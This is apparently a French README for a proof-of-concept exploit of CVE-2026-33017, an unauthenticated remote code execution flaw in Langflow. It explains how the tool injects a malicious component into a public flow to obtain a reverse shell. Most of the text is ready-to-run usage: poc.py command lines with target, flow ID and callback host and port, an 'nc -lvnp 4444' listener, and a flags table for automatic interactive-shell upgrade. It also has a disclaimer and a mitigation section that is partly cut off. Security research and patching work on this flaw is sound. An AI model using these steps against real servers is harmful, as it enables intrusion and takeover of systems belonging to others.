
CVE-2026-33017 Langflow RCE PoC
PoC de la faille d'exécution de code non authentifiée build_public_tmp dans Langflow. Il téléverse un composant malveillant dans un flux public, déclenche un build et récupère un reverse shell.
Réservé aux tests de sécurité autorisés. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.
requests (pip install requests)Lancez l'écouteur intégré et déclenchez l'exploit en une seule fois :
python3 poc.py \
--url https://target:7860 \
--flow-id <public-flow-uuid> \
--lhost <your-ip> \
--lport 4444 \
--listen
Lorsque le shell se connecte, il tente automatiquement de passer à un shell entièrement interactif.
Si vous préférez utiliser votre propre écouteur (par exemple nc -lvnp 4444), retirez --listen :
python3 poc.py --url https://target:7860 --flow-id <uuid> --lhost <your-ip> --lport 4444
CVE-2026-33017 est une RCE non authentifiée dans le point de terminaison POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui exécute le Python fourni par l'attaquant à partir des définitions de nœuds de flux sans sandboxing. Pour en savoir plus, consultez les ressources ci-dessous :
Mesures d'atténuation issues de l'article de Sysdig Threat Research :
/api/v1/build_public_tmp ou désactivez entièrement la construction de flux publics.Cet outil est fourni à des fins de recherche et de tests d'intrusion autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages.
| Flag | Description |
|---|
--url | URL du serveur Langflow cible (obligatoire) |
--flow-id | UUID du flux public partagé (obligatoire) |
--lhost | IP de rappel du reverse shell (obligatoire) |
--lport | Port de rappel du reverse shell (obligatoire) |
--listen | Lance l'écouteur intégré |
--timeout | Délai d'expiration des requêtes HTTP en secondes (par défaut 30) |
-k, --insecure | Désactive la vérification du certificat TLS (certificats auto-signés / expirés) |
--no-upgrade | Ignore la mise à niveau TTY automatique, utilise un shell en ligne basique |